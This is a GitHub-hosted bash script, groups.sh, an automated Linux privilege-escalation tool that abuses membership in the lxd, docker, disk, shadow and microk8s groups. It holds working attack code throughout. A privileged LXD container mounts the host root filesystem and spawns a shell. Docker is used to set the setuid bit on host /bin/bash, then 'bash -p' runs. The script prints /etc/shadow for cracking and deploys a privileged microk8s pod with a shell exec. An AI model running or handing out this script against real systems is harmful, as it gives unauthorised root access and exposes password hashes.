-
Notifications
You must be signed in to change notification settings - Fork 2
/
groups.sh
107 lines (88 loc) · 3.45 KB
/
groups.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/bin/bash
##### LXD,DOCKER,MICROK8S,
RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
BLUE="\e[34m"
ENDCOLOR="\e[0m"
groups | grep lxd &> /dev/null
tita=$(echo $?)
if [[ $tita =~ 0 ]]
then
echo -e "${YELLOW}\n[+]Vulnerable to LXD${ENDCOLOR}"
echo -e "${RED}\nUpload alpine-v3.13-x86_64-20210218_0139.tar.gz file, you can download with this link:${ENDCOLOR}\nhttps://github.com/S12cybersecurity/Groups_PrivEsc/raw/main/alpine-v3.13-x86_64-20210218_0139.tar.gz"
ls alpine-v3.13-x86_64-20210218_0139.tar.gz &> /dev/null
tita2=$(echo $?)
if [[ $tita2 =~ 0 ]]
then
echo -e "\n${GREEN}File Founded!!${ENDCOLOR}\n"
lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage &> /dev/null
lxc init myimage mycontainer -c security.privileged=true &> /dev/null
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true &> /dev/null
lxc start mycontainer &> /dev/null
echo -e "You have host FileSystem in /mnt/root path"
lxc exec mycontainer /bin/sh
else
echo -e "\n${RED}File NOT Found!!${ENDCOLOR}"
exit
fi
else
echo -e "\n${RED}[+]LXD NOT VULNERABLE${ENDCOLOR}"
fi
groups | grep docker &> /dev/null
tita3=$(echo $?)
if [[ $tita3 =~ 0 ]]
then
echo -e "${YELLOW}\n[+]Vulnerable to DOCKER PRIVESC${ENDCOLOR}\n"
polla=$(docker images --format "{{.Repository}}" | head -n 1)
docker run -v /:/mnt --rm -it ubuntu chmod u+s /mnt/bin/bash
bash -p
echo -e "\n${RED}Entering the docker container in case you couldn't pwn with the previous shell${ENDCOLOR}"
echo -e "\nYou have host FileSystem in /mnt path\n"
docker run -v /:/mnt --rm -it ubuntu bash
else
echo -e "\n${RED}[+]DOCKER NOT VULNERABLE${ENDCOLOR}"
fi
groups | grep disk &> /dev/null
tita4=$(echo $?)
if [[ $tita4 =~ 0 ]]
then
echo -e "${YELLOW}\n[+]Vulnerable to DISK PRIVESC${ENDCOLOR}\n"
echo -e "${YELLOW}Files You Can List${ENDCOLOR}\n"
find / -group disk 2>/dev/null
else
echo -e "\n${RED}[+]DISK GROUP NOT VULNERABLE${ENDCOLOR}"
fi
groups | grep shadow &> /dev/null
tita6=$(echo $?)
if [[ $tita6 =~ 0 ]]
then
echo -e "${YELLOW}\n[+]Vulnerable to SHADOW PRIVESC${ENDCOLOR}\n"
echo -e "${YELLOW}/etc/shadow File to try to decrypt hashes${ENDCOLOR}\n"
echo -e "How to do:\n${BLUE}https://nozerobit.github.io/linux-privesc-wrong-permissions/\n\n${ENDCOLOR}"
cat /etc/shadow
else
echo -e "\n${RED}[+]SHADOW GROUP NOT VULNERABLE${ENDCOLOR}"
fi
groups | grep microk8s &> /dev/null
tita7=$(echo $?)
if [[ $tita7 =~ 0 ]]
then
echo -e "${YELLOW}\n[+]Vulnerable to MICROKUBS PRIVESC${ENDCOLOR}\n"
echo -e "${RED}Upload this file to this folder:${ENDCOLOR}\nhttps://raw.githubusercontent.com/S12cybersecurity/Groups_PrivEsc/main/pod.yaml"
ls pod.yaml &> /dev/null
tita10=$(echo $?)
if [[ $tita10 =~ 0 ]]
then
echo -e "\n${GREEN}File Founded!!${ENDCOLOR}\n"
image=$(microk8s.kubectl get deployment -o yaml | grep "image" -m 1 | sed 's/ //g' | cut -c 8-)
sed -i "s/peneduro/$image/" pod.yaml
microk8s.kubectl apply -f pod.yaml
microk8s.kubectl exec -it priv-esc -- /bin/bash
echo -e "\nIf you haven't received a shell, add this value, $image , to the image field of the pod.yaml file.Then run the following commands:\n- microk8s.kubectl apply -f pod.yaml\n- microk8s.kubectl exec -it priv-esc -- /bin/bash"
else
echo -e "\n${RED}File NOT Found!!${ENDCOLOR}"
fi
else
echo -e "\n${RED}[+]MICROKUBS GROUP NOT VULNERABLE${ENDCOLOR}"
fi